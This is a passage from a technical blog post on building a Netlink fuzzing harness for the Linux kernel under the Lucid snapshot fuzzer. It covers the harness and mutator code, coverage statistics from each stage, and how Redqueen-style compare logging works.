<p>I also was able to implement Redqueen by instrumenting compare instructions in Bochs. We’ll get into Redqueen in more details below when we enable compare coverage in our fuzzing experiment and try to determine how helpful it is for this specific target.</p>

<h2 id="harness-development">Harness Development</h2>
<p>With that out of the way, we need something to fuzz! For this, I wanted to do something very broad and shallow, so I homed in on looking at Linux kernel subsystems that accessible via Netlink. Netlink is a network/communication protocol that allows userspace to communicate with the kernel over sockets, vs. something like a driver or a syscall. A lot of the bugs that have been exploited in public the last 5 years, have been bugs in subsystems that have Netlink plumbing, things like: netfilter, the packet scheduler, etc. Because these subsystems are designed to just receive bytes of Netlink buffer data, I thought this would be a great first thing to get fuzzing on.</p>

<p>Since we want to fuzz multiple subsystems (broad, shallow), we first have to figure out how Netlink communications normally function. The typical workflow of a userspace program or utility that wants to communicate with the kernel over Netlink is to open a Netlink socket of a specific type of Netlink protocol, something like the following that are used in the harness: <code class="language-plaintext highlighter-rouge">NETLINK_ROUTE</code>, <code class="language-plaintext highlighter-rouge">NETLINK_XFRM</code>, <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code>, and <code class="language-plaintext highlighter-rouge">NETLINK_CRYPTO</code>. For example:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">socket</span><span class="p">(</span><span class="n">AF_NETLINK</span><span class="p">,</span> <span class="n">SOCK_RAW</span><span class="p">,</span> <span class="n">NETLINK_NETFILTER</span><span class="p">)</span>
</code></pre></div></div>

<p>When the userspace program sends data to the Netlink socket that has a protocol associated with it, we end up in <a href="https://elixir.bootlin.com/linux/v6.17/source/net/netlink/af_netlink.c#L1814"><code class="language-plaintext highlighter-rouge">netlink_sendmsg</code></a>. This function’s job is basically to create an appropriately initialized <code class="language-plaintext highlighter-rouge">struct sk_buff</code> that wraps the user’s data that was sent via the <code class="language-plaintext highlighter-rouge">sendmsg</code> syscall. This socket buffer is then dispatched to the appropriate handler (in the example, the handler for NETFILTER would be <a href="https://elixir.bootlin.com/linux/v6.17/source/net/netfilter/nfnetlink.c#L650"><code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code></a>).</p>

<p>So what I want to do is skip any userspace to kernel context switching in our harness and just inject our fuzzing inputs directly into kernel space to be dispatched to the appropriate handlers. So I ended up structuring the fuzzing input as a series of what I’m calling “messages” and each “message” is its own Netlink message for a random protocol that we’re fuzzing. I settled arbitrarily on fuzzing inputs maxing out at 16 messages, so we can randomly send any number of messages per input up to 16. In the fuzzing harness, we use these data structures to create a fuzzing input:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// An input structure</span>
<span class="k">struct</span> <span class="n">lf_input</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">total_len</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">num_msgs</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="c1">// A message structure</span>
<span class="k">struct</span> <span class="n">lf_msg</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">protocol</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">msg_len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>
</code></pre></div></div>
<p>So the entire input structure is described by <code class="language-plaintext highlighter-rouge">struct lf_input</code> which tells us the total length of the messages it contains and the number of messages followed by all of the messages stuffed together. An individual message is described by <code class="language-plaintext highlighter-rouge">struct lf_msg</code> which contains a <code class="language-plaintext highlighter-rouge">protocol</code> member corresponding to one of the NETLINK protocols we listed earlier (<code class="language-plaintext highlighter-rouge">NETLINK_ROUTE</code>, <code class="language-plaintext highlighter-rouge">NETLINK_XFRM</code>, <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code>, and <code class="language-plaintext highlighter-rouge">NETLINK_CRYPTO</code>) and then the message’s length <code class="language-plaintext highlighter-rouge">msg_len</code> and the message’s data thereafter:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>============================= LUCID INPUT STRUCTURE =============================
lf_input {
  total_len: 4 bytes
  num_msgs:  4 bytes
  ────────────────────
  lf_msg {
    protocol: 4 bytes  (ROUTE=0, XFRM=1, NETFILTER=2, CRYPTO=3)
    msg_len:  4 bytes
    data:     variable (netlink message bytes)
  },
  lf_msg {
    protocol: 4 bytes  (ROUTE=0, XFRM=1, NETFILTER=2, CRYPTO=3)
    msg_len:  4 bytes
    data:     variable (netlink message bytes)
  },
  ... (up to 16 messages)
}
=================================================================================
</code></pre></div></div>

<p>For testing and development purposes, I leveraged the flexibility/power of snapshot fuzzing to just add a new syscall to the Linux kernel that looked like:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SYSCALL_DEFINE2</span><span class="p">(</span><span class="n">lucid_fuzz</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="s">"Inside lucid fuzz!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="c1">// Initialize everything we need to fuzz</span>
	<span class="n">ret</span> <span class="o">=</span> <span class="n">lf_init</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>

    <span class="n">printk</span><span class="p">(</span><span class="s">"Initialization done</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="c1">// Handle fuzz inputs</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">lf_handle_input</span><span class="p">())</span> <span class="p">{</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Cleanup resources, not needed when fuzzing, but good for testing</span>
	<span class="n">lf_cleanup</span><span class="p">();</span>

<span class="nl">done:</span>
    <span class="n">printk</span><span class="p">(</span><span class="s">"Inside done, returning %d!</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So this will take a user supplied data buffer and send it to <code class="language-plaintext highlighter-rouge">lf_init</code>, which is a function I wrote that pre-allocates the socket buffers we want to use (remember we know that at most we can send 16 messages) and finds all of the Netlink subsystem receive handlers, functions like: <code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code>, <code class="language-plaintext highlighter-rouge">rtnetlink_rcv</code>, <code class="language-plaintext highlighter-rouge">crypto_netlink_rcv</code>, and <code class="language-plaintext highlighter-rouge">xfrm_netlink_rcv</code>. When not fuzzing under Lucid, the syscall will copy the user supplied data into the global “fuzzcase” variable and then <code class="language-plaintext highlighter-rouge">lf_handle_input</code> will take care of wrapping that fuzzcase into the appropriate pre-allocated socket buffer and sending it to the appropriate handler. Here is what <code class="language-plaintext highlighter-rouge">lf_handle_input</code> looks like, this is where the magic happens. Keep in mind that the <code class="language-plaintext highlighter-rouge">fc</code> variable is a global, standing for “fuzzcase” and this is where Lucid injects fuzzing inputs:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Main fuzzcase handling logic</span>
<span class="kt">int</span> <span class="nf">lf_handle_input</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="n">curr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_msg</span> <span class="o">*</span><span class="n">msg</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">remaining</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">fuzz_skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Inside lf_handle_input</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="cm">/** LUCID TAKES SNAPSHOT HERE **/</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %dx, %dx"</span><span class="p">);</span>

	<span class="c1">// Make sure we have enough size to make an `lf_input` struct</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">&lt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span><span class="p">))</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Get the `lf_input` and do sanity checks</span>
	<span class="n">curr</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="p">)</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">curr</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">!=</span> <span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">||</span> <span class="n">curr</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_INPUT_SIZE</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">curr</span><span class="o">-&gt;</span><span class="n">num_msgs</span> <span class="o">&gt;</span> <span class="n">LF_MAX_MSGS</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Remaining bytes to consume</span>
	<span class="n">remaining</span> <span class="o">=</span> <span class="n">curr</span><span class="o">-&gt;</span><span class="n">total_len</span><span class="p">;</span>

	<span class="c1">// Since we created a structure, we have consumed the `lf_input` header, we</span>
	<span class="c1">// can count those bytes as consumed and update remaining</span>
	<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Update offset to point to the first message</span>
	<span class="n">offset</span> <span class="o">=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Parse and handle the messages in the</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">curr</span><span class="o">-&gt;</span><span class="n">num_msgs</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// Make sure we have enough size to make an `lf_msg` struct</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">LF_MSG_HDR_SIZE</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Create an `lf_msg` struct</span>
		<span class="n">msg</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_msg</span> <span class="o">*</span><span class="p">)(</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_MSG_SIZE</span> <span class="o">||</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">protocol</span> <span class="o">&gt;=</span> <span class="n">LF_NUM_PROTOCOLS</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We've now consumed the message header bytes</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_MSG_HDR_SIZE</span><span class="p">;</span>

		<span class="c1">// Make sure we have enough data remaining to fill this message</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_len</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Create a fuzzcase skb to send to netlink_rcv function</span>
		<span class="n">fuzz_skb</span> <span class="o">=</span> <span class="n">create_fuzz_skb</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">fuzz_skb</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
		
		<span class="c1">// Dispatch the skb to the appropriate handler</span>
		<span class="n">dispatch_skb</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">fuzz_skb</span><span class="p">);</span>

		<span class="c1">// Update offset</span>
		<span class="n">offset</span> <span class="o">+=</span> <span class="p">(</span><span class="n">LF_MSG_HDR_SIZE</span> <span class="o">+</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_len</span><span class="p">);</span>

		<span class="c1">// Update remaining</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_len</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Check to see if we have remaining, if we do, something is amiss</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="cm">/** LUCID RESTORES SNAPSHOT HERE **/</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %bx, %bx"</span><span class="p">);</span>

	<span class="c1">// Success</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We iterate through the array of messages, parse them, and send them on their way to the appropriate subsystem. I also made this harness extremely strict so that we fail if anything is amiss, even if we have leftover bytes after parsing. This will cause <code class="language-plaintext highlighter-rouge">lf_input</code> to return early and not reach the snapshot restoration NOP instruction. This would cause the fuzzcase to “escape” the fuzzing harness and would eventually incur a timeout. In Lucid, we do timeouts based on the number of emulated instructions. So it would be immediately obvious if we had some mutator/generator/harness bug because the fuzzcases would timeout.</p>

<p>During this portion of development, I was really focused on optimizing the harness. I wanted to skip all of the Netlink sanity checking and plumbing that takes place after the initial <code class="language-plaintext highlighter-rouge">netlink_sendmsg</code> function thinking this would speed up the fuzzer a substantial amount. I was really careful to retain semantic equivalence to that skipped code though. However, in the end, I made mistakes that you may be able to spot. For instance, during a normal <code class="language-plaintext highlighter-rouge">netlink_sendmsg</code> call, the socket buffer that it creates doesn’t have all of the same fields initialized and it doesn’t use kernel sockets. So I actually had a single false positive <code class="language-plaintext highlighter-rouge">NULL</code> pointer dereference crash at one point during my longest fuzzing session that wouldn’t have existed if I had retained 100% semantic equivalence. I think going forward on the blog, I’ll move more towards less invasive harnessing and just eat the performance hit. It became apparent when our fuzzcases started reaching deeper code paths that the fuzzer was extremely slow and the aggressive optimization in the harness wouldn’t have really made much of a difference, so I’m going to skip that going forward.</p>

<p>It should be noted that this is not a great approach for <em>finding bugs</em>. We’re merely trying to assess how Lucid does fuzzing some real code. Sending random messages per input to the various subsystems that have little interplay with one another and can’t access each other in any meaningful way is not a strategy for reaching deep code and finding complex bugs. Fuzzing in this way is more likely to reveal simple shallow parsing level bugs, and in 2025 that is probably not going to yield many results.</p>

<h2 id="stage-1-fuzzing-dumb-byte-mutator">Stage-1 Fuzzing: Dumb Byte Mutator</h2>
<p>First thing is first, let’s throw some random bytes at these Netlink handlers. To do this, I changed how Lucid sees mutator code. Now, there is a top-level <code class="language-plaintext highlighter-rouge">Mutators</code> crate and it defines several generic traits and characteristics that every custom mutator implementation must have. These are things like a <code class="language-plaintext highlighter-rouge">rand</code> function for example. But after you implement the generic stuff that the core fuzzer relies on existing, you are free to have as custom of a mutator as you like. Now you can implement any mutator you want and put it under <code class="language-plaintext highlighter-rouge">mutators/</code> in the source code directory. This allows some pretty nice flexibility. I added a command line flag to specify a mutator by name and then they are created by the factory type function here in <code class="language-plaintext highlighter-rouge">mod.rs</code>:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/// Simple factory to create mutators by name (extend as needed).</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">create_mutator</span><span class="p">(</span>
    <span class="n">name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">,</span>
    <span class="n">seed</span><span class="p">:</span> <span class="nb">Option</span><span class="o">&lt;</span><span class="nb">usize</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">max_size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
<span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">Box</span><span class="o">&lt;</span><span class="k">dyn</span> <span class="n">Mutator</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="k">match</span> <span class="n">name</span> <span class="p">{</span>
        <span class="s">"toy"</span> <span class="k">=&gt;</span> <span class="nf">Ok</span><span class="p">(</span><span class="nn">Box</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">ToyMutator</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">seed</span><span class="p">,</span> <span class="n">max_size</span><span class="p">))),</span>
        <span class="s">"netlink"</span> <span class="k">=&gt;</span> <span class="nf">Ok</span><span class="p">(</span><span class="nn">Box</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">NetlinkMutator</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">seed</span><span class="p">,</span> <span class="n">max_size</span><span class="p">))),</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="o">&amp;</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Unrecognized mutator '{}'"</span><span class="p">,</span> <span class="n">name</span><span class="p">))),</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>I started off by just implementing some basic mutation strategies:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">ByteInsert</code>: Randomly insert bytes of arbitrary value into the message buffer</li>
  <li><code class="language-plaintext highlighter-rouge">ByteOverwrite</code>: Randomly overwrite a byte in the message with a byte of arbitrary value</li>
  <li><code class="language-plaintext highlighter-rouge">ByteDelete</code>: Randomly delete a byte from the message buffer</li>
  <li><code class="language-plaintext highlighter-rouge">BitFlip</code>: Randomly flip a bit in the message buffer</li>
  <li><code class="language-plaintext highlighter-rouge">ProtocolChange</code>: Randomly change the protocol of a message (ie, switch from <code class="language-plaintext highlighter-rouge">NETLINK_ROUTE</code> to <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code>)</li>
</ul>

<p>In addition to these strategies, the mutator will often “stack” these strategies per input. I defined a <code class="language-plaintext highlighter-rouge">MAX_STACK</code> of 7 (arbitrary), and so the mutator may choose to randomly mutate the input with up to 7 of these strategies per iteration.</p>

<p>These mutation strategies actually achieved quite a bit of code coverage surprisingly. Initially, the iterations were extremely short because most Netlink messages we sent were nonsensical. The Netlink message structure looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * struct nlmsghdr - fixed format metadata header of Netlink messages
 * @nlmsg_len:   Length of message including header
 * @nlmsg_type:  Message content type
 * @nlmsg_flags: Additional flags
 * @nlmsg_seq:   Sequence number
 * @nlmsg_pid:   Sending process port ID
 */</span>
<span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="p">{</span>
	<span class="n">__u32</span>		<span class="n">nlmsg_len</span><span class="p">;</span>
	<span class="n">__u16</span>		<span class="n">nlmsg_type</span><span class="p">;</span>
	<span class="n">__u16</span>		<span class="n">nlmsg_flags</span><span class="p">;</span>
	<span class="n">__u32</span>		<span class="n">nlmsg_seq</span><span class="p">;</span>
	<span class="n">__u32</span>		<span class="n">nlmsg_pid</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Since we’re sending random bytes, we rarely have a <code class="language-plaintext highlighter-rouge">nlmsg_len</code> that makes sense for our random message array of bytes. So it took a while for the fuzzer to generate the right type of input to solve early message parsing to actually reach code behind that sanity check. We had to generate an input that had the right length.</p>

<p>Here are the results I achieved with this simple mutator and our aforementioned harness in a short time:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-19 08:57:11)]
globals: uptime: 0d 22h 26m 28s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 88.266M | iters/s: 206.81 | iters/s/f: 25.85
cpu: target: 92.7% | reset: 6.8% | mutator: 0.0% | coverage: 0.5% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 16917 | last find: 0h 2m 6s | map: 25.81%
snapshot: dirty pages: 3841 | dirty / total: 0.00068% | reset memcpys: 438
corpus: inputs: 31000 | corpus size (MB): 318.303 | max input: 0x8088
</code></pre></div></div>

<p>You can see that we fuzzed the harness with this iteration of the mutator for almost a full day on my development VM. It surprisingly captured quite a bit of edges, around ~17k. We can also see that we were able to process quite a bit of iterations as we almost reached 100 million iterations during that time period. Globally across all 8 fuzzers we were sitting at about 200 iterations/sec when the last stats banner printed. Relatively speaking to subsequent versions of the mutator, this is quite a bit of throughput. This is because, like we discussed, most inputs simply didn’t pass initial parsing and so they returned early; in other words, our mutator created a ton of junk that didn’t do anything worthwhile. So while the throughput looks good on paper, it’s actually not good for us. We can also tell this by the relatively high number of CPU time we spend in <code class="language-plaintext highlighter-rouge">reset</code>, meaning we spend almost 7% of our time performing snapshot resets.</p>

<p>It should be noted before we get much further comparing results across different iterations of the fuzzer that these results are likely not very meaningful. We can possibly deduce large picture conclusions like: it’s better to send inputs that have a sane <code class="language-plaintext highlighter-rouge">nlmsg_len</code>, but the results are likely too random to glean much else when we aren’t making 10x improvements. So keep that in mind, we aren’t doing a proper experiment here. I make a change to the fuzzer, run it for a day or so, check results, compare, repeat. With how low our throughput is (Lucid is very slow), and how limited our fuzzing time is, we can’t produce high-quality statistics.</p>

<p>It should also be noted that when I tweeted about fuzzing with Lucid using this mutator, I mentioned that the fuzzer did find an edge case OOB read bug, but it was artificial in that upstream sanity checks that our harness skips would prevent it from happening. So I’m not counting it as Lucid’s first 0day.</p>

<h2 id="stage-2-fuzzing-more-mutation-strategies">Stage 2 Fuzzing: More Mutation Strategies</h2>
<p>The next step is to flesh out the mutator a little more. For the next step, I added several new mutation methods that would enable us to increase our efficiency (not send so much garbage) and also create inputs that would’ve previously been pretty impossible.</p>

<p>I added the following mutation strategies:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">UniProtocol</code>: Make every message in the input target the same protocol</li>
  <li><code class="language-plaintext highlighter-rouge">DuplicateMessage</code>: Duplicate one of the messages in the input</li>
  <li><code class="language-plaintext highlighter-rouge">ShuffleMessages</code>: Randomly shuffle the order of the messages in the input</li>
  <li><code class="language-plaintext highlighter-rouge">SpliceMessage</code>: Steal a message from another input and splice it into the current input</li>
  <li><code class="language-plaintext highlighter-rouge">PatchHeaderLen</code>: Determine what the correct <code class="language-plaintext highlighter-rouge">nlmsghdr-&gt;nlmsg_len</code> value should be and patch it</li>
  <li><code class="language-plaintext highlighter-rouge">PatchHeaderType</code>: Somewhat intelligently, put message type values in place of <code class="language-plaintext highlighter-rouge">nlmsghdr-&gt;nlmsg_type</code> for the subsystems we’re targeting</li>
  <li><code class="language-plaintext highlighter-rouge">PatchHeaderFlags</code>: Randomly create somewhat logically sane <code class="language-plaintext highlighter-rouge">nlmsghdr-&gt;nlmsg_flags</code> values</li>
</ul>

<p>This step helped us quite a bit, it basically improved our efficiency by 2x:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-20 16:24:38)]
globals: uptime: 0d 14h 8m 35s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 2.821M | iters/s: 31.18 | iters/s/f: 3.90
cpu: target: 97.4% | reset: 2.4% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 17740 | last find: 1h 4m 52s | map: 27.07%
snapshot: dirty pages: 7455 | dirty / total: 0.00132% | reset memcpys: 648
corpus: inputs: 313510 | corpus size (MB): 3779.988 | max input: 0x8088
</code></pre></div></div>

<p>As you can see, we were able to capture more edges in about half the time wall-clock wise. In terms of iterations, we were able to capture more edges in 40x less iterations. So this is a pretty massive efficiency boost. I think most of this comes from having sane <code class="language-plaintext highlighter-rouge">nlmsghdr-&gt;nlmsg_len</code> values being saved to the corpus as well as the mutation strategies that allow us to create more complex inputs.</p>

<p>Previously if we were able to randomly generate a message that achieved quite a bit of code coverage, we were kind of limited in that we would have had to get extremely lucky to have another message in the same input randomly become similarly successful via dumb byte flipping. Instead now, we have new strategies like message duplication, message splicing, and unifying protocols so that each message has a chance to be sent to the same subsystem etc, and we can achieve deeper code coverage because our messages can now build off of previous messages in the same input.</p>

<p>Because our inputs had such a dramatically higher chance of passing initial parser checks now, our throughput has plummeted to around 2-4 iterations/sec/fuzzer. I have to admit this was shockingly lower than I expected for the fuzzer. I know Bochs emulation is a considerable slow down from native execution, somewhere around 100x I believe, but I hadn’t really seen it yet because up to this point we had only fuzzed toy targets for fuzzer development. This is why people say not to optimize too early, we had no idea that our Bochs emulation bottleneck was so pronounced and we could’ve spent so much time micro-optimizing core fuzzer code and it wouldn’t have made a difference at all.</p>

<h2 id="stage-3-adding-compare-coverage-with-redqueen">Stage 3: Adding Compare Coverage with Redqueen</h2>
<p>To this point, we hadn’t been using Lucid’s built in Redqueen tooling. For those that are unaware, <a href="https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_04A-2_Aschermann_paper.pdf">Redqueen</a> is the name of a fuzzing paper by the geniuses at Ruhr-University in Bochum that tackles the problem of solving comparisons in fuzzing.</p>

<p>Oftentimes in fuzzing, the target will want to compare values derived from your input to values that it knows should/could exist. For instance, the following may exist semantically in a fuzzing target:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="o">*</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">fuzzing_input</span><span class="p">[</span><span class="mh">0x1337</span><span class="p">])</span> <span class="o">==</span> <span class="mh">0xdeadbeef</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">buggy_function</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In this example, the target is checking our input for the presence of a magic value, in this case <code class="language-plaintext highlighter-rouge">0xdeadbeef</code>. A lof of the time, these simple magic byte value checks represent a huge roadblock in automated fuzzing with no human in the loop. Using our dumb byte flipping mutations, we would have to successively target the 4 consecutive bytes and also randomly make them all the write value. This can be basically impossible in a lot of circumstances.</p>

<p>Redqueen’s contribution is that these types of checks often boil down to <code class="language-plaintext highlighter-rouge">cmp</code> instructions on x86 architectures, where two “operand values” are compared with one another, these being the left operand and the right operand. Now from the point of view of determining which side is derived from the input and which side is derived from the program, it is often impossible to make this distinction. So what Redqueen does is it searches the input for both operands, if it finds one of the operands, it replaces it in the input with the other operand value, hoping that we can now pass the check.</p>

<p>This would be extremely expensive normally during fuzzing, so to minimize overhead, Redqueen only performs this type of mutation on inputs that recently found new code coverage, this way the overhead is mostly a one-time cost and the overhead asymptotes to zero as the campaign progresses and new coverage becomes ever more rare.</p>

<p>This isn’t really a fair overview of the technique, but this conveys the gist. Please read the linked paper if you’re interested, it’s probably my favorite fuzzing paper to date.</p>

<p>We can implement this in our fuzzer because we have access to all compare instructions of all sizes for free in Bochs. So now, what I do is, when I find a new input, I toggle something in the shared execution context data structure between Lucid and Bochs called the “CPU mode” and this tells Bochs what kind of emulation we’re doing. Once we find a new input, I replay the input but with the CPU mode set to <code class="language-plaintext highlighter-rouge">Cmplog</code>. This will cause Bochs to report all of the operand values that it sees in the compare instructions, the instruction pointer value, and the size of the operands back to Lucid. Lucid can now create a data base of values and try the Redqueen strategy for more coverage.</p>

<p>However, we ran into a huge problem, check out the statistics from the Redqueen enabled run:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-21 20:13:29)]
globals: uptime: 0d 14h 18m 23s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 369.79K | iters/s: 0.10 | iters/s/f: 0.01
cpu: target: 9.1% | reset: 0.0% | mutator: 0.0% | coverage: 0.0% | redqueen: 90.9% | misc: 0.0%
coverage: edges: 15829 | last find: 0h 17m 16s | map: 24.15%
snapshot: dirty pages: 7224 | dirty / total: 0.00128% | reset memcpys: 532
corpus: inputs: 32272 | corpus size (MB): 430.671 | max input: 0x8088
</code></pre></div></div>

